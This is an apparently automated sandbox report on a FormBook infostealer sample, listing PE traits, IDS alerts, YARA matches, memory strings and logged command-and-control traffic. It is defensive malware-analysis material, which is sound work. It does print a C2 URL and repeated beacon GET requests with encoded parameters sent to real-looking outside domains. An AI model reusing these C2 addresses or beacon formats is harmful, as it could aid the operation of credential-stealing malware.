Source: 1.2.lpdKSOB78u.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Show sources

Source: lpdKSOB78u.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: lpdKSOB78u.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000004.00000000.237237720.000000000F584000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: lpdKSOB78u.exe, 00000000.00000003.205218390.0000000002BF0000.00000004.00000001.sdmp, lpdKSOB78u.exe, 00000001.00000002.266056817.0000000000A8F000.00000040.00000001.sdmp, raserver.exe, 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: lpdKSOB78u.exe, raserver.exe
Source:	Binary string: RAServer.pdb source: lpdKSOB78u.exe, 00000001.00000002.265910985.0000000000950000.00000040.00000001.sdmp
Source:	Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000004.00000000.237237720.000000000F584000.00000004.00000001.sdmp
Source:	Binary string: RAServer.pdbGCTL source: lpdKSOB78u.exe, 00000001.00000002.265910985.0000000000950000.00000040.00000001.sdmp

Spreading:

Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 0_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405A15
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 0_2_004065C1 FindFirstFileA,FindClose,	0_2_004065C1
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 23.224.206.45:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 23.224.206.45:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 23.224.206.45:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 104.21.76.239:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 104.21.76.239:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 104.21.76.239:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49753 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49753 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49753 -> 34.102.136.180:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.torontotel.com/4qdc/

Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=n05rnph+IqNz0mbSS5vp9sGjLY7dyqnysY607r4vHHjCLr3ziiRBE07QjlPjM5GqarqD&2dz=onbha HTTP/1.1Host: www.pcareinc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=FDPsk0sff5Lw+z8Vw8rcgpm8MWqJfMs2bvH8+cW5/POI2TSyhlXdRmW8g+C2mzqgUbJY&2dz=onbha HTTP/1.1Host: www.antips.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=+7VgHCQQJYO0FHfoX4VwpMGRpMkf/fkwbCKrV3wMZoe5nkwvpaAzoW+aSblNd7Hd+wjC&2dz=onbha HTTP/1.1Host: www.edgewooddhr.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=fgRLe1wDsIR582SpVqHNrqc5X9FQKzC9eNMuu75MPd7YekjVZ2QEORs18XDbgwZ5UcjJ&2dz=onbha HTTP/1.1Host: www.ndk168.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=DRpehdA/33BzcPgqXFJLC0P+7mKy3AC9kGgryjypn4W4a4lypWUQvIUJQnrelubfkLFp&2dz=onbha HTTP/1.1Host: www.inbarrel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=ZB8Pl5eBC7Hephg+P6iGhrGYsApNwIB7ekAHWQJEYqlC8jRN6CLcZFL5CLWpIktyGytq&2dz=onbha HTTP/1.1Host: www.39palmavenue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=t6rgzpThEavL/zg9991GCjSWOfv9/TODS4c0mNe7yolhiaEFU/O6K33zqhrleftTdvyE&2dz=onbha HTTP/1.1Host: www.buildassetswealth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=uT9syTVFNHzfIlw/vi0ORJwgGNlm67yR3EiChoWxlToAUfSEqT6/a/KF0zmtzwOHQ1u8&2dz=onbha HTTP/1.1Host: www.beconfidentagain.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=XrM9oEi9W6a6X8UVQlR+JUyFbINbZfC+p7wdaOxjToB4fXjiFd7gjA62KvYw0vzt+GJp&2dz=onbha HTTP/1.1Host: www.rehabcareconnect.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=oetlJbthpq9VCk3sxGtc819EDOSw/wKhNDSOaTnbk4bTW9QfHQR4t80kWNVKaJln9Y1c&2dz=onbha HTTP/1.1Host: www.speedysnacksbox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=o1YYd6Gi2K67gelLAX14ago2MHBzIaWFdtb1Ca8ijRLt6mEmIsAV47qF7pv8e7ASo7Rk&2dz=onbha HTTP/1.1Host: www.havemercyinc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 208.91.197.27 208.91.197.27

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=n05rnph+IqNz0mbSS5vp9sGjLY7dyqnysY607r4vHHjCLr3ziiRBE07QjlPjM5GqarqD&2dz=onbha HTTP/1.1Host: www.pcareinc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=FDPsk0sff5Lw+z8Vw8rcgpm8MWqJfMs2bvH8+cW5/POI2TSyhlXdRmW8g+C2mzqgUbJY&2dz=onbha HTTP/1.1Host: www.antips.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=+7VgHCQQJYO0FHfoX4VwpMGRpMkf/fkwbCKrV3wMZoe5nkwvpaAzoW+aSblNd7Hd+wjC&2dz=onbha HTTP/1.1Host: www.edgewooddhr.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=fgRLe1wDsIR582SpVqHNrqc5X9FQKzC9eNMuu75MPd7YekjVZ2QEORs18XDbgwZ5UcjJ&2dz=onbha HTTP/1.1Host: www.ndk168.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=DRpehdA/33BzcPgqXFJLC0P+7mKy3AC9kGgryjypn4W4a4lypWUQvIUJQnrelubfkLFp&2dz=onbha HTTP/1.1Host: www.inbarrel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=ZB8Pl5eBC7Hephg+P6iGhrGYsApNwIB7ekAHWQJEYqlC8jRN6CLcZFL5CLWpIktyGytq&2dz=onbha HTTP/1.1Host: www.39palmavenue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=t6rgzpThEavL/zg9991GCjSWOfv9/TODS4c0mNe7yolhiaEFU/O6K33zqhrleftTdvyE&2dz=onbha HTTP/1.1Host: www.buildassetswealth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=uT9syTVFNHzfIlw/vi0ORJwgGNlm67yR3EiChoWxlToAUfSEqT6/a/KF0zmtzwOHQ1u8&2dz=onbha HTTP/1.1Host: www.beconfidentagain.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=XrM9oEi9W6a6X8UVQlR+JUyFbINbZfC+p7wdaOxjToB4fXjiFd7gjA62KvYw0vzt+GJp&2dz=onbha HTTP/1.1Host: www.rehabcareconnect.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=oetlJbthpq9VCk3sxGtc819EDOSw/wKhNDSOaTnbk4bTW9QfHQR4t80kWNVKaJln9Y1c&2dz=onbha HTTP/1.1Host: www.speedysnacksbox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4qdc/?sxlpdB=o1YYd6Gi2K67gelLAX14ago2MHBzIaWFdtb1Ca8ijRLt6mEmIsAV47qF7pv8e7ASo7Rk&2dz=onbha HTTP/1.1Host: www.havemercyinc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.pcareinc.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlLast-Modified: Tue, 09 Jul 2019 06:18:14 GMTEtag: "999-5d2431a6-2d9d76b743ab0996;;;"Accept-Ranges: bytesContent-Length: 2457Date: Tue, 23 Feb 2021 08:20:07 GMTServer: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 2

Source: explorer.exe, 00000004.00000000.237000933.000000000F540000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot
Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix
Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf
Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold
Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf
Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff
Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2
Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/27586/searchbtn.png)
Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/27587/BG_2.png)
Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/27587/Left.png)
Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/27587/Right.png)
Source: lpdKSOB78u.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: lpdKSOB78u.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	String found in binary or memory: http://rdfs.org/sioc/ns#
Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	String found in binary or memory: http://rdfs.org/sioc/types#
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

Code function: 0_2_004054B2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004054B2

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

